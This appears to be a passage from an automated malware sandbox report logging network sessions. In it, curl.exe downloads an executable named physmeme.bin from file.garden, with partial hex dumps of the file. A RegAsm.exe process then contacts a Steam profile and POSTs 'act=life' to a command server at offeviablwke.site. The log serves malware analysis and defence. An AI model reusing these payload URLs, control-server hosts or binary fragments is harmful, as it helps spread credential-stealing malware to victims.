                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6
                                                                                                                                                                                                            Data Ascii: !$auEktEkE(3PQx"EP!|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjD
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00
                                                                                                                                                                                                            Data Ascii: M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPK


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.749704188.114.96.34432172C:\Windows\System32\curl.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC104OUTGET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1
                                                                                                                                                                                                            Host: file.garden
                                                                                                                                                                                                            User-Agent: curl/7.83.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 30 Sep 2024 16:33:32 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 370176
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-powered-by: Express
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                            last-modified: Sun, 22 Sep 2024 19:01:04 GMT
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 682255
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iIadF%2F%2BdbyBcLGmO9dxhkzegxKqiDZ6IAkojzejneEfVvr4Tkl8zDDkxU5LAHIJL0uKHgCpZUkdXmNTCfdLf743pvCMXngx2fn%2F10smD8da0oyautXNCqcYskAmXDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8cb59d840e055e78-EWR
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC555INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f
                                                                                                                                                                                                            Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ|m&.y;KR7Skm?8ID&!0%N!\\L^0\j|MM;*qUO!'%. dEuQ-w$IX0df$|(gEN3J*T?
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4
                                                                                                                                                                                                            Data Ascii: 2[5CX",_:k$J48Q3e,|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74
                                                                                                                                                                                                            Data Ascii: }> :?mQEB_|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ct
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4
                                                                                                                                                                                                            Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2
                                                                                                                                                                                                            Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d
                                                                                                                                                                                                            Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98
                                                                                                                                                                                                            Data Ascii: gxJfS{~ZsN\pVw`d[rcEDb=B|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA|yUsmje|\<_td $}d4Nl6*fc_
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24
                                                                                                                                                                                                            Data Ascii: A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<*:eyy}VTZZ=,$Gz*\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$
                                                                                                                                                                                                            2024-09-30 16:33:32 UTC1369INData Raw: e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31
                                                                                                                                                                                                            Data Ascii: .h!L3y8s6}*.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</|L|[2}cr"DeN)vv_eH*4jnm$WS_k5c:TiNSRjX*'TD|K{31


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.749705104.102.49.2544437312C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Mon, 30 Sep 2024 16:33:36 GMT
                                                                                                                                                                                                            Content-Length: 34678
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=5e03757b3701ffbdc022c322; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC16384INData Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC3768INData Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
                                                                                                                                                                                                            2024-09-30 16:33:36 UTC12INData Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: dy></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.749706172.67.197.404437312C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-30 16:33:37 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: offeviablwke.site
                                                                                                                                                                                                            2024-09-30 16:33:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2024-09-30 16:33:37 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 30 Sep 2024 16:33:37 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=48e2tn57pq9nvk0eko0g5kild5; expires=Fri, 24 Jan 2025 10:20:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwOESkzEMbXa3xmC7KvNg2j3%2F5mSSTBoXC5ONSMvdSIszLMEtrrLUIfrCxg2SxJ%2FlWIG7FRObV8cUCTagtkvm7e8HfVkfg0xQRPPDuVd%2FDsMpSmN5cmGkhGyg4%2BTmmUg4QhZ8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8cb59d9f6b79431b-EWR
                                                                                                                                                                                                            2024-09-30 16:33:37 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                            Data Ascii: aerror #D12
                                                                                                                                                                                                            2024-09-30 16:33:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

